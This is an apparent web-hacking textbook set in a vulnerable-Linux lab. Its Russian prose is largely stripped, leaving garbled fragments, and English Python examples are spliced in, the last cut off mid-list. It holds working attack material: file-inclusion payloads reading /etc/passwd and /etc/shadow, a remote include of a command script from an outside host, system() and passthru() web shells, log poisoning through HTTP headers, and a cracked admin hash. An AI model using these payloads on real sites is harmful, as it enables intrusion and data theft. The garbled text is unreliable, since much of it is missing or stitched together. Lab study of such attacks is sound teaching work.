
32.988-018-07
004.738.52
85

85

. .
-: (+DVD). .: , 2011.
176 .: .
ISBN 978-5-4237-0184-0
-,
. ,
, , . Linux
Damn Vulnerable Linux Back Track 4,
Windows.
,
.
, .

32.988-018-07
004.738.52

. .
, , ,
. , ,

, .

, 2011

ISBN 978-5-4237-0184-0


00. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
I. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
01. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
02. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
II. - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
03. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
04. PHP- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
05. SQL- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
06. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
07. SQL- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
08. PHP- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
09. CRLF- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
III. ?. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
0A. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88
0B. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
0C. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102
0D. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
0E. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 118
0F. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122
10. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 124
11. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126
12. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
13. IT- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
1. *nix- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138
2. SQL- show.php Cyphor . . . . . . . . . . . . . . . . . . 140
3. Cyphor . . . . . . . . . . . . . . . . . . . . . . 144
4. SQL-
Cyphor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150
5. SQL- MS SQL Jet . . . . . . . . . . . . . . . . . . . . . . . . . . 152
6. nabopoll.php . . . . . . . . . . . . . . . 155
7. SQL-
MS Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157
8.
instantCMS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158
9. SQL- . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161
10. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 166


00. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
I. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
01. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14
02. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16
II. - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
03. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
04. PHP- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
PHP- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31
PHP- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 35
PHP- NaboPoll . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
- Apache . . . . . . . . . . . 41
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45
05. SQL- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53
- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
SQL- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
06. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 60
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
-, XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
<script> . . . . . . . . . . . . . . . . . . . . . . . . . . . 67

07. SQL- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 70
MySQL @@version . . . . . . . . . . . . . . 71
mysql.user . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72
/ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
SQL- NaboPoll . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 74
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
08. PHP- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
/proc/self/environ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83
Apache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
09. CRLF- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
III. ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
0A. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88
0B. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
0C. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102
*nix- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102
LDAP- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105
MD5- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 106
0D. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
0E. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 118
0F. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122
10. . . . . . . . . . . . . . . . . . . . . . . . . . 124
11. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 126
12. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 128
13. IT- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
. . . . . . . . . . . . . . . . . . . 131
ICQ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 135
1. *nix- . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 138
2. SQL- show.php Cyphor . . . . . . . . . . . . . . 140
3. Cyphor . . . . . . . . . . . . . . . . 144

4. SQL-
Cyphor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 150
5. SQL- MS SQL Jet . . . . . . . . . . . . . . . . . . . . . 152
6. nabopoll.php . . . . . . . . . . . 155
7. SQL-
MS Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157
8.
instantCMS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 158
9. SQL- . . . . . . . . . . . . . . . . . . . . . 161
find_in_set(substr, strlist) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 161
find_in_set() + more1row . . . . . . . . . . . . . . . . . . . . . . . . . . . 163
10. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 166

00


,
. ( ,
, ), - -,
.
, .
, .
, , ,
,
.
Linux (
Windows), ,
Linux, .
,
( , , ,
, ). ,
, , ,
,
.
( ,
).


, 1995 1999
( , ,


). ,
. , ,
. .
2002
( 2004 ). .


DVD-
Linux, Damn Vulnerable Linux Back Track 4.
,
, 02.

PHP.
, ,
.
,
comp@piter.com ( , ).
!
-
http://www.piter.com.


 01.
 02.


01

. *nix Unix- ( , AIX, HPUX, SunOS, Solaris, Linux, FreeBSD, OpenBSD, NetBSD - ).
Windows
Microsoft ,
Windows. , , ,
.

-
:
-? - c. , , ,
- .
- -, . ,
, ,
, , ,
.
- , , ,
, ( ).
- ,
. , ,
-,
.
-:
 ( );
 ;

 ;
 ( ,
).
. .
. Hacked by . (,
. .). , , , -
. , .
( .)
. . , -
, . :
,

.
. , ,
. , .
(
Windows) ( *nix).
, , ;
, -
.
. - ,
( )

. , , .
, , .
, . ,
- ,
, . ,
.
, .


, , IP. - (proxy), ,
( ). ,
. ,
, . ,
. (),
, -
. ,
-, . -
, , ,
.
, , . , - ftp-.
free proxy list
.
, IP- (, www.2ip.
ru), , , .
, ,
!
.
, SocksChain
Ufasoft,
.
.
(Virtual Private Network, VPN). , (
VPN ). VPN
.

. ,
, ,
. ,
.ru. , www.hidemyass.com.
.
,


( ), .
.
.
, , ,
. (.gov) (.mil) , (.edu).
( , )
( ). ,
.
,
.
. ,
(live-CD) .
.
( ) . , , ,
, .
,
.
.
,
, ,
.


02

, ,
().
Linux, Damn Vulnerable Linux Back Track 4.

DVD.

. Damn Vulnerable Linux (


, DVL) Back Track 2.
DVL 1.5.
: www.damnvulnerablelinux.org.
(: ). DVL
(live-CD),
. ,
,
. , , .
. ? (
Windows), ,
.
,
.
VMware VirtualBox. VMware Player, .
(-) www.vmware.com/
products/player/, www.VMware.com/Download. VMware.


DVL VMware,
Other Linux 2.6.x
kernel ( , 2.6). VMware,
512 .

Back Track 4. www.backtrack-linux.org/downloads/.

BT4 VMware,
Linux Ubuntu.

, Linux , Linux,
. .

. 02.1. VMware Player


, VMware Player .
( ,
), ,
VMware Player -.
, .
1. VMware Player. , . 02.1.
Create a New Virtual Machine ().
2. , . 02.2,
Installer disk image file (iso) Damn Vulnerable
Linux, Browse. C:\Damn Vulnerable
Linux 1.5, DVL_1.5_Infectious_Disease.iso. Next.

. 02.2. , 1

3. , . 02.3,
Next.
4. (. 02.4)
. ,
DVL DamnVulnerableLinux, . Next.


. 02.3. , 2

. 02.4. , 3

5. . 02.5.
, , 8 , DVL


2 , 8
(
). , 2 , Split virtual
disk into 2 GB files, .
, , 2 ,
. Next.

. 02.5. , 4

6. , Finish ( 02.6).
512 , 256
Damn Vulnerable Linux .
Customize Hardware.
7. . 02.7. , (796 ). 2 ( ),
. , , - A Auto
detect (). , , , OK.
, . 02.6.
Finish, .


. 02.6. , 5

. 02.7. , 6


.
. 02.8. Removable Devices (
), OK.
I Finished Installing ( ),
Linux
. , Ctrl, , , G ( Ctrl+G
).
, Ctrl+Alt (Ctrl Alt ).

. 02.8.

root Enter.
(password) toor ( root )
Enter. , :
bt ~ # _


bt , # , . # $.
Linux.
Linux , ,
Enter.
KDE startx
Enter. :
bt ~ # startx

, .
Linux, , Windows
( , Windows), .
- ,
,
( Linux),
, .

. 02.9. KDE


,
. 02.9.
KDE. Firefox ( )
. , Windows-.

( ), (de). , ,
.
,
. (Ctrl+Alt),
VMPowerSuspend.
. VMware Player.
Back Track 4,
, , , Linux Ubuntu, Linux,
I Finished Installing ( ).


II
-

 03.
 04. PHP-
 05. SQL-
 06.
 07. SQL-
 08. PHP-
 09. CRLF-


03

- - -, . - .
. . (bug) .
- -, .
, (, PHP).
,
, Linux- -. ,
DVL , http- (-
Apache). HTTPD ( ). Konqueror ( Windows). Start HTTPD
OK. , - . ,
Konqueror , -.
( http://) Location
Enter.
Board51, - (http://localhost). (Firefox Konqueror)

http://localhost/webexploitation_package_02/board51/board.php

, , (. 03.1).
, , , ,
*nix-. Windows
(, C D) D:\\Inetpub\wwwroot\board51\.
, -
Apache ( - *nix-,


. 03.1. Board51

Windows). , - ,
- (-) . ,
, (Internet Explorer, Opera, Firefox . .), , , -. - -
(, ), -,
, . .
, Board51 , . , , ,
. boarddata/data/user.idx
, , ICQ . , ,
. ( , , ,
,
.)

http://localhost/webexploitation_package_02/board51/boarddata/data/user.idx


. 03.2. user.idx Board51

user.idx (. 03.2).
, (Admin),
( ) :
21232f297a57a5a743894a0e4a801fc3

MD5 (Message Digest 5).


,
( ). ,
-, .
, http://hash.insidepro.com/
index.php?lang=rus (. 03.3). InsidePro, .
, CAPTCHA , ,
(). :
21232f297a57a5a743894a0e4a801fc3:admin
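The same lookup done offline, as an added example that is not part of the book: a small dictionary attack with Python's hashlib against the admin hash recovered above. The word list is constructed for the demo; the MD5 of "admin" is the value the page shows, and the salted variant shows why a per-user salt makes such lookups useless.

```python
import hashlib


def md5_hex(text):
    """Hex digest of the UTF-8 bytes of text, the form board51's user.idx stores."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def crack_md5(target_hashes, wordlist):
    """Offline version of the online lookup: hash every candidate once and match it
    against all targets at the same time. Returns {hash: plaintext} for those found."""
    wanted = {h.lower() for h in target_hashes}
    found = {}
    for word in wordlist:
        h = md5_hex(word)
        if h in wanted:
            found[h] = word
    return found


def salted_md5(salt, text):
    """Why a per-user salt defeats a precomputed table: same password, different digest."""
    return md5_hex(salt + text)


# Constructed mini word list for the demo; real ones have millions of entries.
WORDLIST = ["123456", "root", "qwerty", "admin", "password", "letmein"]
```

With WORDLIST the admin hash from user.idx resolves to "admin" in a few microseconds; the online services in the chapter do the same thing with a much larger list and a cache of previous answers.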

http://localhost/webexploitation_
package_02/board51/board.php (. . 03.1), Benutzername

Admin ( ),
(admin) Anmelden.
(Warning), Cancel. ,
Enter.
(. 03.4). ,
! , .


. 03.3. -

. 03.4. Board51

, IP- .
. , , .


IP- , . ,
TCP/IP, IP-, .
IP 4 IP- ( 0 254), , :
192.168.2.11. () IP-, ,
IP- 127.0.0.1.
, .
1 65 535.
, .
- , , . , - 80, FTP 21.
, ,
, , . ,
, , IP-
, . ,
-, IP 80,
, -. -, ,
IP- ( , )
-.
.


04

PHP-

PHP, -,
include(), -
. PHP, . ( . include
[-]). (Local File Include,
LFI) (Remote File Include, RFI).
.
, ,
HTTP FTP . , ,
. .

PHP-

. :
http://[target]/index.php?page=./../../../../../etc/passwd%00

[target] ,
www.site.com. /etc/passwd. :
 ./ ;
 ../ , Unix- .
%00
HTTP (null-byte).
. ,
,
.php .txt.
: /etc/passwd.php, .
, .



index.php . , DamnVulnerableLinux
- /usr/local/apache/htdocs/. ,
(
../) 4 , .
, htdocs,
. ,
-,
, , .
/usr/local/apache/htdocs/ -. ,
, -,
.
( Windows)
Damn Vulnerable LinuxToolsEditorsKate, Kate ( , ,
). Default Session ( , , , DVL ).
( (!)):
<?
$page = ($_GET['page']);
include("./htdocs/$page.php");
?>

(-)? PHP. , , .
$page,
page, .
htdocs (
$page)
.php. . , ( ) . ,
, ,
. ( FileSave)
/usr/local/apache/htdocs. , , Enter
. .
my.php , Save.
, .php.
, .
(Firefox Konqueror)
:
http://localhost/my.php?page=./../etc/passwd%00


localhost ( : www.site.com).
, . 04.1.

. 04.1. /etc/passwd

!
../ ,
http://localhost/my.php?page=./../../etc/passwd%00
http://localhost/my.php?page=./../../../etc/passwd%00
...

, /etc/passwd, . 04.2.
! !
/etc/passwd , : . .
ViewView Document Source ( Konqueror)
ViewPage Source ( Firefox)
(. 04.3).


. 04.2. /etc/passwd

. 04.3. /etc/passwd

/etc/passwd? , () .
. (
root). root () 0 0. x
. ,
/etc/shadow ( FreeBSD
: /etc/master.passwd). /etc/shadow,
, , ,
. ? , .
,


, /etc/shadow.
, .
/etc/shadow root , root.
,
. , ,
,
( 0). , Linux - /etc/shadow .

http://localhost/my.php?page=./../../../../../etc/shadow%00

, , root, - Apache, ,
,
Permission denied ( , ).
/etc/shadow , .
%00 (
)
http://localhost/my.php?page=./../../../../../etc/passwd%00

, . /etc/shadow, ,
? ?
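How the include() path actually comes out, as an added example rather than code from the book: a Python model of include("./htdocs/$page.php") from my.php, including the null-byte truncation of PHP before 5.3.4 (PHP 5.3.4 and later reject paths that contain a NUL, so the %00 trick fails there). DOCROOT and the prefix follow the chapter's description of the DVL layout; the function names are this example's own.

```python
import posixpath

# Lab layout assumed from the chapter (hypothetical constants for this demo):
# my.php sits in the Apache document root and runs include("./htdocs/$page.php").
DOCROOT = "/usr/local/apache/htdocs"
INCLUDE_PREFIX = "./htdocs/"
INCLUDE_SUFFIX = ".php"


def resolve_include(page, cwd=DOCROOT, null_byte_truncates=True):
    """Return the path include("./htdocs/$page.php") actually opens for a ?page= value.

    null_byte_truncates=True models PHP before 5.3.4, where a NUL inside the path cut
    the string at the C level, so the appended ".php" never reached the filesystem.
    Later PHP versions refuse such paths instead, which is why the trick stopped working.
    """
    path = INCLUDE_PREFIX + page + INCLUDE_SUFFIX
    if null_byte_truncates and "\x00" in path:
        path = path.split("\x00", 1)[0]
    return posixpath.normpath(posixpath.join(cwd, path))


def traversal_depth(cwd=DOCROOT):
    """How many ../ are needed to climb from the include base directory up to /."""
    base = posixpath.normpath(posixpath.join(cwd, INCLUDE_PREFIX))
    return base.count("/")


def traversal_payload(target_file, cwd=DOCROOT):
    """Build the ./../../...<file>%00 value that makes resolve_include() open target_file."""
    return "./" + "../" * traversal_depth(cwd) + target_file.lstrip("/") + "\x00"


def as_query_value(page):
    """URL form of the payload: the NUL must travel as %00, never as a literal byte."""
    return page.replace("\x00", "%00")


def probe_urls(base_url, target_file, max_depth=8):
    """The incremental search from the chapter: one URL per extra ../ until the file shows up."""
    return [f"{base_url}?page=./{'../' * d}{target_file.lstrip('/')}%00"
            for d in range(1, max_depth + 1)]
```

Because the script prepends "./htdocs/", the climb starts one level below the document root, which is why five ../ are needed to reach / on this layout; without the %00 the same value resolves to /etc/passwd.php and the include fails.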

. .

PHP-
, , , .

PHP, *nix, .

http://[target]/inj.php?inc=http://narod.ru/cmd.txt&cmd=ls

cmd.txt
http://narod.ru. ls,
.


(FileNew)
:
<?
$page = ($_GET['page']);
include("$page");
?>

-.
my.php
inj.php (FileSave As) , my.php.
, include htdocs
.php, ,
. ,
.
, (,
FTP). .

<pre>
<?php
print("<b>$cmd</b>\n");
system($cmd);
?>
</pre>

cmd.php , inj.php.
HTML <pre> </pre> ,
(
). print $cmd
, . system() ,
$cmd, .
, ,
:
http://localhost/inj.php?page=http://localhost/cmd.php?cmd=ls

, - . 04.4.
ls, .
, - , .
inj.php cmd.php,
Parse error: , , ,
. .


. 04.4. ls

, ls *nix-.
, uname ( Unix-,
).
pwd (print working directory ) id ( ).
, nobody (
uid=99), nogroup (
gid=99). , ,
groups. , Linux-
- nobody.
dir, , ls, , .
, , .
, .
, ( . shell ) *nix-,

(). *nix ,
Windows, CMD.exe. *nix-
bash sh.
, *nix- . Unix
(- ), (-- )


. , uname -a Unix-. ,
. , ls -la
,
( *nix ).

Linux Unix ,
- .

, ls -al ls -la. -
. ,
.
? Linux $IFS,
().
ls$IFS-la. , ,
! . 04.5.
-:
<pre><? system($_GET['cmd']);?></pre>

, + ,
ls -la ls+-la. .
. 04.5 .
(total). drwxr-xr-x? d , (-).
, ,
, ,
:
 r (read);
 w (write);
 x (execute).
:
-rw--w-r-x 1 bob csc532 70 Apr 23 20:10 file
drwx------ 2 sam A1 2 May 01 12:01 directory


( , . 04.5
root, , , bob sam).
, .


. 04.5. ls -la

() ,
. . 04.5 root ( ).
, ,
. ,
. , , , abc
(d), root root:
drwxr-xr-- 10 root root 107 Jan 18 2009 abc

, (rwx),
, (r-x),
(r--). , 18 2009
(Jan 18 2009).
ls -lad.
. ( root) chown
. () chmod. ,
, ( 7 ) ,


( 5) (
5):
chmod 755 < >

, ,
.
, , :
0 ;
1 ;
2 ;
3 ;
4 ;
5 ;
6 ;
7 (, ).
( root)
, .
- . cat
, . ,
cat /etc/passwd /etc/passwd. ,
- : cat$IFS/etc/passwd
: cat+/etc/passwd.
*nix, *nix. 1.
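To make the permission column mechanical, an added Python example (not from the book) that converts between the ls -l field and the octal digits chmod takes, parses lines like the ones quoted above, and lists the world-writable entries, which is what an attacker looks for when choosing where to drop a shell. The sample lines used in the checks are the chapter's own.

```python
PERM_BITS = (("r", 4), ("w", 2), ("x", 1))


def mode_from_ls(perm_field):
    """Turn the first column of ls -l into (type, octal string):
    '-rw--w-r-x' -> ('-', '625'), 'drwxr-xr-x' -> ('d', '755').
    setuid/setgid/sticky appear as s/S (x slot of owner/group) or t/T (others) and
    become a fourth leading digit: '-rwsr-xr-x' -> ('-', '4755')."""
    if len(perm_field) != 10:
        raise ValueError("expected a 10-character permission field, got %r" % perm_field)
    ftype, triads = perm_field[0], perm_field[1:]
    digits, special = [], 0
    for n in range(3):                       # 0 = owner, 1 = group, 2 = others
        triad = triads[n * 3:n * 3 + 3]
        value = 0
        for ch, (letter, bit) in zip(triad, PERM_BITS):
            if ch == letter or (letter == "x" and ch in "st"):
                value |= bit
            elif ch != "-" and not (letter == "x" and ch in "ST"):
                raise ValueError("unexpected character %r in %r" % (ch, perm_field))
            if letter == "x" and ch in "sStT":
                special |= 4 >> n            # setuid=4, setgid=2, sticky=1
        digits.append(str(value))
    octal = "".join(digits)
    return ftype, (str(special) + octal) if special else octal


def ls_from_mode(octal):
    """Inverse, for reading chmod arguments: '755' -> 'rwxr-xr-x', '4755' -> 'rwsr-xr-x'."""
    octal = octal.zfill(4)
    special, triads = int(octal[0]), octal[1:]
    out = []
    for n, digit in enumerate(triads):
        value = int(digit)
        bits = "".join(letter if value & bit else "-" for letter, bit in PERM_BITS)
        if special & (4 >> n):
            bits = bits[:2] + ("st" if value & 1 else "ST")[n == 2]
        out.append(bits)
    return "".join(out)


def parse_ls_line(line):
    """Split one 'ls -la' line into fields; the name is everything after the date."""
    parts = line.split(None, 8)
    if len(parts) != 9:
        raise ValueError("not an ls -l line: %r" % line)
    ftype, octal = mode_from_ls(parts[0])
    return {"type": ftype, "mode": octal, "links": int(parts[1]), "owner": parts[2],
            "group": parts[3], "size": int(parts[4]), "mtime": " ".join(parts[5:8]),
            "name": parts[8]}


def world_writable(lines):
    """Entries anyone can write to: where a web shell or an INTO OUTFILE result can land."""
    entries = [parse_ls_line(l) for l in lines if not l.startswith("total")]
    return [e["name"] for e in entries if int(e["mode"][-1]) & 2]
```

The others digit is the one that matters for a shell running as nobody: a directory with mode 777 (the chmod 777 used on the cyphor directory later in the book) is writable by the web server, and therefore by anyone who can run commands through it.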

PHP-
NaboPoll
NaboPoll
( survey.inc.php, path) , ( , , ) .
, , :
http://localhost/webexploitation_package_02/nabopoll/
survey.inc.php?path=http://localhost/cmd.php?cmd=ls%00

. 04.6.


. 04.6. ls NaboPoll

-
Apache
, -, () Apache. ,
Apache - httpd-access.log httpd-error.log, - (
access.log, , , error.log).
DVL : access_log error_log,
/usr/local/apache/logs. ,
access_log -,
. :
http://localhost/index.php?page=./../../logs/access_log%00

access_log.
telnet 80 :
telnet 127.0.0.1 80

:
GET <pre><?passthru($_GET['cmd']);?></pre> HTTP/1.1


Enter 400 (. 04.7),


-, <pre><?passthru
($_GET['cmd']);?></pre>, access_log error_log
:
error_log:
[error] [client 127.0.0.1] Invalid URI in request GET <pre><?passthru($_GET['cmd']);?></pre> HTTP/1.1

access_log:
127.0.0.1 - [30/Jun/2010:13:00:40 +0200] "GET <pre><?passthru($_GET['cmd']);?></pre> HTTP/1.1

. 04.7. - Apache

- , ,
, PHP
, , .
, , access_log,
.
, GET, .
- Referer User-Agent,
( !):
# telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET / HTTP/1.1
Accept: */*
Accept-Language: en
Accept-Encoding: deflate
User-Agent: Lynx/2.8.5rel.1 libwww-FM/2.14
Host: 127.0.0.1
Connection: Close
Referer: http://127.0.0.1/<pre><?passthru($_GET['cmd']);?></pre>

Enter.
Referer. User-Agent.
:
http://localhost/index.php?page=./../logs/access_log%00&cmd=ls+-la

- +, ls -la.
.
access_log,
(. 04.8).
error_log . ,
ftpd ( FTP), , Apache, - ( ,

. 04.8. - access_log


- ).
, , , txt, log . .
, .
. , .
- <pre><? passthru($_GET['cmd']);?></pre>, avatar.gif
, :
http://[target]/forum.php?page=./../smileys/avatar.gif%00&cmd=ls

.
, avatar.gif ,

- .
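The poisoning request and its detection side, as an added example that is not part of the book: a Python function that builds the raw request with the payload in Referer and User-Agent, and a parser for Apache common/combined log lines that flags any request line or header carrying a PHP open tag. The log lines are constructed for this example in the format the chapter shows; the 400 status comes from the chapter, the sizes are sample values.

```python
import re

PAYLOAD = "<pre><?passthru($_GET['cmd']);?></pre>"


def poisoning_request(host, payload=PAYLOAD):
    """Raw HTTP/1.1 request (typed into telnet or nc as in the chapter) that plants the
    payload in Referer and User-Agent. Apache copies both into access_log, escaping only
    quotes and control characters, neither of which this payload contains."""
    return (
        "GET / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: {payload}\r\n"
        f"Referer: http://{host}/{payload}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )


# Apache common/combined log line; the referer/user-agent pair is absent in the common format.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)")?'
)
# A PHP open tag has no business in a request line or a client header.
PHP_OPEN_TAG = re.compile(r"<\?(php\b|=|\s|[A-Za-z_])")


def find_poisoned(log_lines):
    """Detection side: (ip, field, value) for every logged field that carries PHP code."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        for field in ("request", "referer", "user_agent"):
            value = m.group(field) or ""
            if PHP_OPEN_TAG.search(value):
                hits.append((m.group("ip"), field, value))
    return hits


# Constructed sample lines: the 400 from the bad request line, the clean request that
# carries the payload in its headers, and an ordinary visit that must not be flagged.
SAMPLE_LOG = [
    '127.0.0.1 - - [30/Jun/2010:13:00:40 +0200] "GET <pre><?passthru($_GET[\'cmd\']);?></pre> HTTP/1.1" 400 226',
    '127.0.0.1 - - [30/Jun/2010:13:02:11 +0200] "GET / HTTP/1.1" 200 1024 '
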